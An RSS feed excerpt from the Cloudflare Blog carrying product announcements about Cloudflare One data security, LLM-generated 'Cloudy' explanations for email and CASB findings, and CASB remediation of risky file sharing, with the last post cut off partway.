
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Sat, 04 Apr 2026 11:03:55 GMT</lastBuildDate>
        <item>
            <title><![CDATA[From the endpoint to the prompt: a unified data security vision in Cloudflare One]]></title>
            <link>https://blog.cloudflare.com/unified-data-security/</link>
            <pubDate>Fri, 06 Mar 2026 14:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare One unifies data security from endpoint to prompt: RDP clipboard controls, operation-mapped logs, on-device DLP, and Microsoft 365 Copilot scanning via API CASB. ]]></description>
            <content:encoded><![CDATA[ <p>Cloudflare One has grown a lot over the years. What started with securing traffic at the network now spans the endpoint and SaaS applications – because that’s where work happens.</p><p>But as the market has evolved, the core mission has become clear: data security is enterprise security.</p><p>Here’s why. We don’t enforce controls just to enforce controls. We do it because the downstream outcomes are costly: malware, credential theft, session hijacking, and eventually the thing that matters most: sensitive data leaving the organization. What looks like a simple access policy can be the first link in a chain that ends in incident response, customer impact, and reputational damage.</p><p>So when you take a step back, most security programs – even the ones that look different on paper – are trying to answer the same questions:</p><ul><li><p>Where is sensitive data?</p></li><li><p>Who can access it?</p></li><li><p>What paths exist for it to move somewhere it shouldn’t?</p></li></ul><p>That’s the backbone of our data security vision in <a href="https://www.cloudflare.com/sase/"><u>Cloudflare One</u></a>: a single model that follows data across the places it moves, not a pile of siloed controls. That means:</p><ul><li><p>Protection in transit (across Internet + SaaS access)</p></li><li><p>Visibility and control at rest (inside SaaS)</p></li><li><p>Enforcement in use (on endpoints)</p></li><li><p>And now, coverage at the prompt (as AI becomes a new interface to enterprise data)</p></li></ul><p>Think of these as one connected system: visibility tells you what’s happening, controls constrain where data can move, and enforcement closes the last-mile gaps when content leaves an app. That’s the endpoint-to-prompt problem: data moves faster than product boundaries, so policy needs to follow the data, not the tool.</p><p>In this post, we’ll walk through a set of updates that push that vision forward – from browser-based Remote Desktop Protocol (RDP) controls, to operation-level logging, to endpoint data loss prevention (DLP), to AI security scanning for Microsoft 365 Copilot. </p>
    <div>
      <h3>Remote access without data sprawl: browser-based RDP clipboard controls</h3>
      <a href="#remote-access-without-data-sprawl-browser-based-rdp-clipboard-controls">
        
      </a>
    </div>
    <p><a href="https://blog.cloudflare.com/browser-based-rdp/"><u>Browser-based RDP</u></a> is a practical way to provide remote access when you can’t assume a managed endpoint or installed client – common for contractors, partners, and occasional access workflows. Cloudflare One’s browser-based RDP adds visibility and policy controls to that access. But once you’re delivering a full RDP experience in the browser, the question becomes simple: how granular are your controls over where data can move, especially via the clipboard?</p><p>Today, we’re adding a setting that directly protects data: clipboard controls for browser-based RDP. With this <a href="https://developers.cloudflare.com/cloudflare-one/networks/connectors/cloudflare-tunnel/use-cases/rdp/rdp-browser/#clipboard-controls"><u>new feature</u></a>, security and IT administrators will now be able to decide whether their users can copy or paste information between their local device and the browser-based RDP session.</p><p>Clipboard restrictions are a perfect example of the productivity-security tradeoff. If users can’t copy and paste in the workflow they rely on, they’ll route around the control, whether it’s by taking screenshots, retyping data, or shifting work to unmanaged tools. Clipboard controls let you be precise: allow the workflow where it’s safe, and block it where it isn’t.</p><p>With clipboard controls in browser-based RDP, administrators can enable the copy/paste workflow users expect while enforcing granular control over directionality and context. For example, if users access a customer support portal that contains sensitive customer information, you might allow copy/paste into the session for productivity, but block copy/paste out of the session to prevent data from landing on unmanaged endpoints.</p><p>This functionality is now available in Cloudflare One and can be configured as a new setting within Access Application Policies for browser-based RDP apps.</p>
    <div>
      <h3>Visibility without guesswork: operation mapping in logs</h3>
      <a href="#visibility-without-guesswork-operation-mapping-in-logs">
        
      </a>
    </div>
    <p>While remote access controls reduce risk, to tune them well, you also need to understand the specific actions users are taking inside SaaS apps.</p><p>We use a process called <b>operation mapping</b> (detailed in <a href="https://blog.cloudflare.com/ai-prompt-protection/#how-we-built-it"><u>a recent blog post</u></a>) to give visibility to these actions and simplify the way customers write policies for SaaS services. Our mapping process takes various elements of an HTTP request and interprets them as a single operation, e.g. ‘SendPrompt’, in the example of ChatGPT. We collect multiple operations that perform similar actions into an Application Control, e.g., ‘Share’ or ‘Upload’. The [what?] is viewable in our HTTP policy builder, allowing for simple policy authoring. </p><p>Today, we’ve taken that process a step further to enrich logs and provide greater visibility over how SaaS applications are being used in your organization – by extending that mapping into logging. Without any additional configuration, operations and application controls will now appear in log events for traffic that matches our <a href="https://developers.cloudflare.com/cloudflare-one/traffic-policies/http-policies/granular-controls/#compatible-applications"><u>operation maps</u></a>.</p><p>In log details, you’ll now see both the application control group and the specific operation (e.g., SendPrompt for ChatGPT). This makes investigations and policy tuning faster.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/tkgCxY8qze9SeHupiYfPR/1563abb3c0386941ef461c3ffed018f0/log-details.png" />
          </figure><p>The added context helps you understand usage patterns, accelerate forensic analysis, and spot potentially risky behavior, so you can tune policy with less guesswork and disruption to users.</p><p>Visibility is step one. To protect data in use, especially what moves through the clipboard, you also need enforcement on the endpoint.</p>
    <div>
      <h3>Better endpoint protection: on-device DLP in the Cloudflare One Client</h3>
      <a href="#better-endpoint-protection-on-device-dlp-in-the-cloudflare-one-client">
        
      </a>
    </div>
    <p>In a modern enterprise, sensitive information routinely moves from managed applications into unmanaged contexts – often via the clipboard. The risk isn’t only a file leaving the organization; it can be a snippet of proprietary code or a customer record pasted into an unauthorized <a href="https://www.cloudflare.com/learning/ai/what-is-large-language-model/"><u>large language model (LLM)</u></a> or personal tool.</p><p>Cloudflare One already helps protect data in transit with <a href="https://blog.cloudflare.com/casb-dlp/#understanding-dlp"><u>Gateway and DLP</u></a>, and provides visibility and control at rest through <a href="https://blog.cloudflare.com/casb-dlp/#understanding-casb"><u>CASB</u></a> and its <a href="https://developers.cloudflare.com/cloudflare-one/applications/scan-apps/casb-integrations/"><u>API integrations</u></a>. Now we’re extending coverage to data in use by bringing Endpoint DLP enforcement to the Cloudflare One Client, starting with high-signal workflows like clipboard movement, so data protection doesn’t stop the moment content leaves a browser tab.</p><p>That means sensitive data copied from a protected SaaS app doesn’t immediately become “policy-free” content the moment it hits the OS clipboard. With Endpoint DLP, teams can extend data protection to users’ fingertips without deploying a second agent or stitching together complex integrations.</p><p>For teams already using Cloudflare One for <a href="https://www.cloudflare.com/sase/use-cases/data-protection/"><u>data protection</u></a>, Endpoint DLP completes the model by adding a consistent enforcement layer for data in use.</p><p>This is the endpoint-to-prompt problem: if sensitive data can be copied locally, it can be pasted into an AI assistant just as easily. Once you protect data in use, the next question becomes unavoidable – what happens when that same data is transformed at the prompt?</p>
    <div>
      <h3>AI visibility without blind spots: M365 Copilot scanning with API CASB</h3>
      <a href="#ai-visibility-without-blind-spots-m365-copilot-scanning-with-api-casb">
        
      </a>
    </div>
    <p>Last year, Cloudflare One and API CASB became the <a href="https://blog.cloudflare.com/casb-ai-integrations/"><u>first to offer API integrations with OpenAI ChatGPT, Anthropic Claude, and Google Gemini offerings</u></a> – and we’re not done yet. </p><p>Starting today, customers using Cloudflare One’s <a href="https://www.cloudflare.com/sase/products/casb/"><u>API Cloud Access Security Broker</u></a> (CASB) – which scans SaaS apps via API for common, yet risky security issues – can now analyze <a href="https://developers.cloudflare.com/cloudflare-one/integrations/cloud-and-saas/microsoft-365/"><u>Microsoft 365 Copilot</u></a> activity for data security issues, including chats and uploads that match DLP detection profiles.</p><p>Copilot findings surface with rich context (file references, profile matches, and interaction metadata) so teams can triage quickly instead of starting from raw audit logs.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2c2tzwBiDnF7sU0q983Gyl/9a84c088aa766bf0fd8b71a29a75aeae/image4.png" />
          </figure><p><sup>A CASB Finding showing detection of a file used in M365 Copilot that matches an enabled DLP Profile</sup></p><p>Customers can now see when Copilot activity includes sensitive data. For example, user prompts, Copilot responses, and uploaded files that match DLP detection profiles.</p><p>Microsoft 365 Copilot findings are available by default as part of the Microsoft 365 integration. If you already use this integration, go to Integrations in the Cloudflare One dashboard, update your Microsoft 365 connection, and start receiving Copilot findings. If you’re new to the integration, connect your Microsoft 365 tenant to gain visibility into Copilot usage and associated data security findings.</p><p>As AI product sprawl continues, we’ll be massively expanding coverage across additional AI assistants and core SaaS platforms throughout 2026 – stay tuned!</p>
    <div>
      <h3>What’s next: unified data security in Cloudflare One</h3>
      <a href="#whats-next-unified-data-security-in-cloudflare-one">
        
      </a>
    </div>
    <p>Over the last few years, enterprise security has expanded across more surfaces: SaaS, unmanaged endpoints, remote access patterns, and now AI assistants. But the objective – protecting sensitive data – hasn’t changed. The updates in this post reflect a single direction: consistent visibility and enforcement across data in transit, at rest, in use, and at the prompt. So policy follows data, not product boundaries.</p><p>Looking forward, our vision is broader than “data security features in data security products.” Over time, every Cloudflare One product will become more data-security-aware, with more data-oriented configurability, visibility, controls, and guardrails, built directly into the workflows teams already use across <a href="https://www.cloudflare.com/sase/products/access/"><u>Access</u></a>, <a href="https://www.cloudflare.com/sase/products/gateway/"><u>Gateway</u></a>, endpoint enforcement, and SaaS integrations. The goal is simple: wherever your users work and wherever data moves, Cloudflare One should be able to explain what’s happening and help you control it.</p><p>As the modern perimeter spreads across applications, browsers, endpoints, and AI prompts, patching together point solutions becomes harder to operate and easier to bypass. By building data security directly into Cloudflare One – from access controls to endpoint enforcement to AI visibility – and continuing to unify these layers, we’re helping teams build a clearer, more complete picture of their data risk and their data security posture from the endpoint to the prompt.</p><p>To get started, explore <a href="https://www.cloudflare.com/sase/"><u>Cloudflare One</u></a> or <a href="https://www.cloudflare.com/contact/sase/"><u>contact our team</u></a> to learn more about the platform and these new features.</p> ]]></content:encoded>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[Data Protection]]></category>
            <category><![CDATA[CASB]]></category>
            <category><![CDATA[Cloudflare Access]]></category>
            <category><![CDATA[WARP]]></category>
            <category><![CDATA[DLP]]></category>
            <category><![CDATA[Cloudflare Gateway]]></category>
            <guid isPermaLink="false">66d1PG4KE6FjrBqG2OqMCW</guid>
            <dc:creator>Alex Dunbrack</dc:creator>
        </item>
        <item>
            <title><![CDATA[How Cloudy translates complex security into human action]]></title>
            <link>https://blog.cloudflare.com/cloudy-upgrades-for-cloudflare-one/</link>
            <pubDate>Tue, 03 Mar 2026 06:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudy is our LLM-powered explanation layer built directly into Cloudflare One. Its explanations, now part of Phishnet and API CASB, can improve user decisions and SOC efficiency. ]]></description>
            <content:encoded><![CDATA[ <p>Today’s security ecosystem generates a staggering amount of complex telemetry. For instance, processing a single email requires analyzing sender reputation, authentication results, link behavior, infrastructure metadata, and countless other attributes. Simultaneously, <a href="https://www.cloudflare.com/sase/products/casb/"><u>Cloud access security broker (CASB)</u></a> engines continuously scan SaaS environments for signals that detect misconfigurations, risky access, and exposed data.</p><p>But while detections have become more sophisticated, explanations have not always kept pace.</p><p>Security and IT teams are often aware when something is flagged, but they do not always know, at a glance, why. End users are asked to make real-time decisions about emails that may impact the entire organization, yet they are rarely given clear, contextual guidance in the moment that matters.</p><p><a href="https://developers.cloudflare.com/fundamentals/reference/cloudy-ai-agent/"><u>Cloudy</u></a> changes that.</p><p>Cloudy is our LLM-powered explanation layer, built directly into Cloudflare One. It translates complex machine learning outputs into precise, human-readable guidance for security teams and end users alike. Instead of exposing raw technical signals, Cloudy surfaces the reasoning behind a detection in a way that drives informed action.</p><p>For <a href="https://www.cloudflare.com/en-au/sase/products/email-security/"><u>Cloudflare Email Security</u></a>, this means helping users understand why a message was flagged before they escalate it to the security operations center, or SOC. For Cloudflare CASB, it means helping administrators quickly understand the risk and remediation path for SaaS findings without having to manually assess low-level signals.</p><p>This post outlines how we are extending Cloudy across <a href="https://developers.cloudflare.com/cloudflare-one/email-security/settings/phish-submissions/"><u>Phishnet</u></a> and API CASB to improve decision making, reduce unnecessary noise, and turn complex security signals into clear, actionable insight.</p>
    <div>
      <h2>Cloudy for Email Security users</h2>
      <a href="#cloudy-for-email-security-users">
        
      </a>
    </div>
    <p>When an email is analyzed by <a href="https://www.cloudflare.com/sase/products/email-security/"><u>Cloudflare Email Security</u></a>, it is not evaluated by a single signal or model. Instead, a wide range of machine learning models analyze different parts of the message, from sender reputation and message structure to content, links, and behavioral patterns. This model set continues to grow as our machine learning team regularly trains and deploys new detections to keep pace with evolving threats.</p><p>Based on this analysis, messages are labeled with outcomes such as Malicious, Suspicious, Spam, Bulk, or Spoof. While these detections have been effective, we consistently heard feedback from customers that it was not always clear why a message was flagged. The decision was correct, they told us —  but the reasoning behind it was often opaque to both end users and security teams.</p><p>To address this, we introduced the first version of <a href="https://blog.cloudflare.com/cloudy-driven-email-security-summaries/"><b><u>Cloudy</u></b><u>: LLM-powered summaries for detections</u></a>. These summaries translate what our machine learning models are seeing into human readable explanations. Initially, these summaries were available in the Cloudflare dashboard to help SOC teams during investigations. Over the past few months, customer feedback has confirmed that these explanations significantly improve understanding in our detections.</p><p>As we continued speaking with customers, another challenge surfaced. Our <b>Phishnet</b> tool allows users to submit messages to the SOC when they believe an email may be suspicious. While this empowers employees to participate in security, many SOC teams told us their queues were being flooded with submissions that turned out to be clean messages.</p><p>The result was unnecessary backlog and slower response times for emails that actually required investigation.</p><p>At the same time, customers told us that traditional security awareness training was not always enough. Users still struggled to evaluate emails in the moment, when it mattered most. They wanted more contextual guidance directly within the workflow where decisions are made.</p><p>This upgrade is designed to address both of these problems. By bringing clearer explanations and contextual education directly into Phishnet, we aim to help users make better decisions while reducing noise for SOC teams, without sacrificing security.</p>
    <div>
      <h3>The problem: Some users flag too many emails, while some aren’t cautious enough</h3>
      <a href="#the-problem-some-users-flag-too-many-emails-while-some-arent-cautious-enough">
        
      </a>
    </div>
    <p>As organizations and attack techniques have evolved, so has the role of the end user. Modern email threats increasingly rely on social engineering, subtle impersonation, and psychological pressure which places users directly in the decision path.</p><p>In response, users are being asked to act as an additional layer of defense. However, traditional security awareness tools often fall short. Training is typically delivered through periodic sessions or simulated phishing campaigns, disconnected from real messages and real decisions. When users encounter an unfamiliar email, they are left without enough context to confidently assess risk.</p><p>This gap commonly leads to one of two outcomes. Some users submit nearly every questionable message to the SOC, creating excessive noise and slowing down investigations. Others interact with messages they should not, simply because nothing in the moment signals clear risk.</p><p><b>By embedding Cloudy directly into Phishnet, we close this gap. </b></p><p>Users receive immediate, contextual explanations that help them understand what Cloudflare is seeing and why a message may be risky. This enables users to make informed decisions at the point of interaction, reduces unnecessary escalations to the SOC, and allows security teams to focus on the messages that truly require attention.</p><p>Over time, this approach shifts users from being a source of noise to becoming an effective part of the detection and response workflow. The result: stronger email security, without adding friction or burden to security teams.</p>
    <div>
      <h3>Phishnet for Microsoft gets a Cloudy upgrade</h3>
      <a href="#phishnet-for-microsoft-gets-a-cloudy-upgrade">
        
      </a>
    </div>
    <p>In the next month, we will be upgrading our Phishnet reporting button to extend the Cloudy summaries.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6dO9TV4MfE2R0YZ035QQ7/3693156d65a4c8aca4b2b9d57e77ce87/image1.png" />
          </figure><p><sub><i>The new Phishnet screens will show Cloudy summaries.</i></sub></p><p>With this upgrade, end users receive a simplified, user-friendly version of Cloudy summaries at the moment they report a message. These summaries are generated in real time using Cloudflare Workers AI and run directly on Cloudflare’s global Workers platform when a user interacts with a message in Phishnet.</p><p>When a user clicks the Phishnet reporting button, the request triggers a Workers-based workflow that aggregates structured outputs from multiple detection models associated with that message. These model outputs include signals such as sender reputation, domain and infrastructure characteristics, authentication results, link and content analysis, and behavioral indicators collected during message processing.</p><p>The aggregated signals are then passed to Workers AI, where a series of purpose-built prompts generate a natural language explanation. Each prompt is designed to transform low-level detection outputs into a concise and human-readable summary. This process focuses on explanation rather than classification and does not alter the original disposition of the message.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5PSAZclxFkdcvSivalmoCn/b355e9e6cf667e6e8e9587f6946db5c6/image6.png" />
          </figure><p><sub><i>How Cloudy transforms detections into clear explanations.</i></sub></p><p>For this experience, we intentionally redesigned the summaries compared to those shown to administrators in the Cloudflare dashboard. During testing, we found that admin-focused summaries often relied on technical concepts that were difficult for non-technical users to interpret. Terms such as ASNs, IP reputation, or authentication failures required translation. </p><p>To ensure end users can understand the summaries, Phishnet emphasizes plain-language explanations while preserving the meaning of the underlying detections.</p><table><tr><td><p><b>Signal</b></p></td><td><p><b>What it means</b></p></td><td><p><b>Cloudy translation for end users</b></p></td></tr><tr><td><p>SPF Fail</p></td><td><p>Sender explicitly not authorized by SPF</p></td><td><p>This email failed a sender verification check.</p></td></tr><tr><td><p>DKIM Fail</p></td><td><p>Message signature does not validate</p></td><td><p>The message integrity check failed, which can be a sign of tampering.</p></td></tr><tr><td><p>DMARC Fail</p></td><td><p>DMARC policy check failed</p></td><td><p>The sender’s domain could not confirm this email is legitimate.</p></td></tr><tr><td><p>Reply to Mismatch</p></td><td><p>Reply To differs from From</p></td><td><p>Replies may go to a different address than the sender shown.</p></td></tr><tr><td><p>Domain Age</p></td><td><p>Domain recently registered</p></td><td><p>The sender domain is newly created, which is common in phishing.</p></td></tr><tr><td><p>URL Low Reputation</p></td><td><p>Destination URL has poor reputation</p></td><td><p>The link destination has signals associated with risk.</p></td></tr></table><p>Because this workflow runs on the Cloudflare Workers platform, summaries are generated with low latency and at global scale — so users receive immediate feedback at the moment of interaction. This real-time context allows users to better understand why an email may be risky or why it appears safe before deciding whether to escalate it to the SOC.</p><p>We are currently beta testing this experience with Microsoft customers to ensure the summaries are accurate and reliable. <b>Cloudy summaries are not trained on customer data.</b> We are also applying additional validation to ensure the generated explanations do not hallucinate. Accuracy is critical at this stage as incorrect guidance could introduce real security risk.</p><p>Following the beta period, we plan to expand access to all Microsoft users. We will also bring similar upgrades to the Phishnet sidebar for Google Workspace users later in 2026.</p>
    <div>
      <h2>Your CASB findings, explained with Cloudy</h2>
      <a href="#your-casb-findings-explained-with-cloudy">
        
      </a>
    </div>
    <p>But helping end users better understand what makes an email risky is only part of the story. We are also applying Cloudy to the administrative side of security operations, where clarity and speed matter just as much. Beyond Phishnet, Cloudy now translates complex CASB findings into structured explanations that help security and IT teams quickly understand risk, prioritize remediation, and take confident action across their SaaS environments.</p>
    <div>
      <h3>API CASB in the wild</h3>
      <a href="#api-casb-in-the-wild">
        
      </a>
    </div>
    <p>Inside <a href="https://www.cloudflare.com/sase/"><u>Cloudflare One</u></a>, our SASE platform, CASB connects to the SaaS and cloud tools your teams already use. By talking to providers over API, CASB gives security and IT teams:</p><ul><li><p>A consolidated view of misconfigurations, overshared files, and risky access patterns across apps like Microsoft 365, Google Workspace, Slack, Salesforce, Box, GitHub, Jira, and Confluence (<a href="https://developers.cloudflare.com/cloudflare-one/applications/scan-apps/casb-integrations/"><u>CASB Integrations</u></a>).</p></li><li><p>Continuous scanning for new issues as users collaborate, share, and adopt new tools.</p></li><li><p>Findings that are organized, searchable, and exportable for triage and reporting.</p></li></ul>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1CH5fnjMQL3oK5PdF9F1bT/d34abcaa64d536cd8706a407f20ba2a9/image2.png" />
          </figure><p><sub><i>A typical CASB Findings page showing detections for a Microsoft 365 finding.</i></sub></p>
    <div>
      <h3>Making SaaS security straightforward</h3>
      <a href="#making-saas-security-straightforward">
        
      </a>
    </div>
    <p>Until now, understanding what exactly triggered a CASB Finding — the detections that CASB makes across connected SaaS integrations — has been a black box. While the information was there to put together an explanation of why that file, that user, that configuration was triggering a CASB Finding Type, it wasn’t exactly obvious the reason why it was ultimately detected by our system.</p><p>With the introduction of Cloudy summaries in CASB, users receive a short description of the detection rationale with the specific details of the match listed out for easy comprehension.</p><p>Unlike a simple text summary, Cloudy for CASB provides a structured breakdown designed for immediate remediation. As seen in our beta testing across different providers, from Microsoft 365 to Dropbox, the model consistently parses findings into two distinct sections:</p><ul><li><p>Risk: It identifies exactly why the finding matters. For instance, rather than just noting a 'Suspended User,' Cloudy clarifies that this 'may indicate a compromised account or a user who should no longer have access to company data'.</p></li><li><p>Guidance: It offers immediate next steps. Instead of generic advice, it suggests specific actions, such as verifying if a suspension was intentional or reviewing an application's legitimacy before revoking access.</p></li></ul><p>This structure ensures that analysts can understand the gravity of a finding without needing deep expertise in the specific SaaS application involved.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/BkfPI5VWYYaGzjjHsfyEz/16783ef841292ff66972222afda350e9/image4.png" />
          </figure><p><sub><i>An example Cloudy Summary in a CASB Posture Finding.</i></sub></p><table><tr><td><p><b>Finding Type</b></p></td><td><p><b>Technical Signal</b></p></td><td><p><b>Cloudy Translation (Risk &amp; Guidance)</b></p></td></tr><tr><td><p><b>Identity &amp; Access</b></p></td><td><p>Dropbox:</p><p>Suspended User</p></td><td><p>Risk: A suspended user account may indicate a compromised account or a user who should no longer have access to company data.</p><p></p><p>Guidance: Verify that the suspension is intentional and that the user's access has been properly revoked.</p></td></tr><tr><td><p><b>Shadow IT</b></p></td><td><p>Google Workspace:</p><p>Installed 3rd-party app</p></td><td><p>Risk: This installed application with Google Sign In access may pose a risk of unauthorized access to user data.</p><p></p><p>Guidance: Review the application's legitimacy and necessity, and consider revoking access if it is no longer needed.</p></td></tr><tr><td><p><b>Email Security</b></p></td><td><p>Microsoft 365:</p><p>Domain DMARC record not present</p></td><td><p>Risk: The absence of a DMARC record may leave the domain vulnerable to email spoofing and phishing attacks.</p><p></p><p>Guidance: Configure a DMARC record for the domain to specify how to handle unauthenticated emails.</p></td></tr><tr><td><p><b>Data Loss Prevention</b></p></td><td><p>Microsoft 365:</p><p>File publicly accessible + DLP Match</p></td><td><p>Risk: This file being shared publicly with edit access may allow unauthorized modifications... especially given the potential sensitive content indicated by the DLP Profile match.</p><p></p><p>Guidance: Review the file's content... and consider restricting access if necessary.</p></td></tr></table><p>We know that when it comes to our customers getting to the bottom of identified security issues, time is of the essence. We believe that any amount of unnecessary uncertainty or lack of clarity around what’s going wrong just puts more time between an imperfect state and one that is more secure.</p><p>We built this feature on the same privacy-first foundations as all products at Cloudflare. Cloudy summaries in CASB are generated using Cloudflare Workers AI, ensuring that your data remains within our secure infrastructure during analysis. The models are not trained on your SaaS data, and the summaries are generated ephemerally to aid in triage. This allows your team to leverage the speed of AI without exposing sensitive internal documents or configurations to public models.</p>
    <div>
      <h3>What’s next</h3>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>For Email Security, we will continue to expand how Cloudy supports both administrators and end users. Our focus is on delivering clearer explanations, better in context guidance, and deeper integration into daily workflows.</p><p>For CASB, we’re excited to look for opportunities where Cloudy can make it even easier for CASB administrators to understand what’s going on across their cloud and SaaS apps. Keep an eye out as we look to expand Cloudy coverage to allow administrators to query their findings using natural language, further reducing the time it takes to identify and remediate risks.</p><p>Looking ahead, this includes richer explanations for additional detection types, tighter feedback loops between user actions and detections, and continued improvements to how users and SOC teams collaborate through Phishnet. Our goal is to make Cloudy a core part of how organizations understand, trust, and act on email security decisions.</p><p>We provide all organizations (whether a Cloudflare customer or not) with free access to our <a href="https://developers.cloudflare.com/cloudflare-one/email-security/retro-scan/"><u>Retro Scan</u></a> tool, allowing them to use our predictive AI models to scan existing inbox messages in Microsoft 365. </p><p>Retro Scan will detect and highlight any threats found, enabling organizations to remediate them directly in their email accounts. With these insights, organizations can implement further controls, either using <a href="https://www.cloudflare.com/zero-trust/products/email-security/"><u>Cloudflare Email Security</u></a> or their preferred solution, to prevent similar threats from reaching their inboxes in the future.</p><p>If you are interested in how Cloudflare can help secure your inboxes, sign up for a phishing risk assessment <a href="https://www.cloudflare.com/lp/email-security-self-guided-demo-request/?utm_medium=referral&amp;utm_source=blog&amp;utm_campaign=2025-q3-acq-gbl-modernsec-es-ge-general-ai_week_blog"><u>here</u></a>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/FcaNb9DmTtKE1VbgLfPtT/5824d6eacb9f4ea5fe09c3dbd0843ba1/image3.png" />
          </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[CASB]]></category>
            <guid isPermaLink="false">6S9GOOoOPdJX0xziMyNShi</guid>
            <dc:creator>Ayush Kumar</dc:creator>
            <dc:creator>Alex Dunbrack</dc:creator>
        </item>
        <item>
            <title><![CDATA[See risk, fix risk: introducing Remediation in Cloudflare CASB]]></title>
            <link>https://blog.cloudflare.com/remediation-in-cloudflare-casb/</link>
            <pubDate>Tue, 03 Mar 2026 06:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare CASB Remediation lets security teams go beyond visibility to fix risky file sharing in Microsoft 365 and Google Workspace directly from Cloudflare One, all in just a few clicks. ]]></description>
            <content:encoded><![CDATA[ <p>Starting today, Cloudflare CASB customers can do more than see risky file-sharing across their SaaS apps: they can fix it, directly from the Cloudflare One dashboard.</p><p>This launch marks a huge advancement for Cloudflare’s <a href="https://www.cloudflare.com/zero-trust/products/casb/"><u>Cloud Access Security Broker</u></a> (CASB). Since its release, Cloudflare’s API-based CASB has focused on providing robust, comprehensive visibility and detection. It also connects to the SaaS tools your business runs on, surfacing misconfigurations, and flagging overshared data before it becomes tomorrow’s incident.</p><p>With today’s release of Remediation – a new way to fix problems with just a click, right from the CASB Findings page – CASB begins its next chapter, and moves from telling you what’s wrong to helping you make it right.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3sl5Cse8hP3nZwE1deik09/1ee2d7d9f61eceb4a23868b9dab7bbbc/image4.png" />
          </figure><p><sub><i>An example of a Remediation Action (Remove Public File Sharing) in a CASB Finding.</i></sub></p>
    <div>
      <h2>CASB 101: A single place to see SaaS risk</h2>
      <a href="#casb-101-a-single-place-to-see-saas-risk">
        
      </a>
    </div>
    <p>Inside <a href="https://www.cloudflare.com/zero-trust/"><u>Cloudflare One</u></a>, our SASE platform, CASB connects to the SaaS and cloud tools your teams already use. By talking to providers over API, CASB gives security and IT teams:</p><ul><li><p>A consolidated view of misconfigurations, overshared files, and risky access patterns across apps like Microsoft 365, Google Workspace, Slack, Salesforce, Box, GitHub, Jira, and Confluence (<a href="https://developers.cloudflare.com/cloudflare-one/applications/scan-apps/casb-integrations/"><u>CASB Integrations</u></a>).</p></li><li><p>Continuous scanning for new issues as users collaborate, share, and adopt new tools.</p></li><li><p>Findings that are organized, searchable, and exportable for triage and reporting.</p></li></ul><p>But until now, the actual fixing usually happened somewhere else, whether it’s inside each app’s admin UI, or through a ticket to the team that owns that tool. Remediation closes that loop.</p>
    <div>
      <h2>Remediation: CASB’s next chapter</h2>
      <a href="#remediation-casbs-next-chapter">
        
      </a>
    </div>
    <p>The launch of CASB Remediation marks a major shift forward for the product and Cloudflare One, and we have a ton of big updates planned for the next year. </p><p>With today’s release, we focused on fixing file-share issues in <a href="https://developers.cloudflare.com/cloudflare-one/integrations/cloud-and-saas/microsoft-365/#file-sharing"><u>Microsoft 365</u></a> and <a href="https://developers.cloudflare.com/cloudflare-one/integrations/cloud-and-saas/google-workspace/#file-sharing"><u>Google Workspace</u></a>.</p><p>With Remediation, you can fix the highest-impact, most common file risks we see across customers, including:</p><ul><li><p>Public links that let anyone on the Internet view or edit a file.</p></li><li><p>Files shared company-wide across your tenant or domain, even when just a handful of people should have access.</p></li><li><p>Files shared outside your organization to personal accounts and external domains.</p></li><li><p>All of the above, when they also match a DLP Profile. For example, a document full of customer records, credentials, or financial details.</p></li></ul><p>When you trigger the ‘Remove sharing’ Remediation action on a supported finding, CASB immediately moves to remove the risky sharing configuration (for example, the public link or organization-wide access) from the file in question. And crucially, Remediation only removes risky sharing; it doesn’t delete files or change who owns them.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3Te9jeJnI3TRXdxbyT19cf/9f429b27cfd5a6e9fe39b69656cc723c/image3.png" />
          </figure><p><sub><i>A new page to track the progress and success of Remediated CASB findings.</i></sub></p>
    <div>
      <h2>Two starting points: Microsoft 365 and Google Workspace</h2>
      <a href="#two-starting-points-microsoft-365-and-google-workspace">
        
      </a>
    </div>
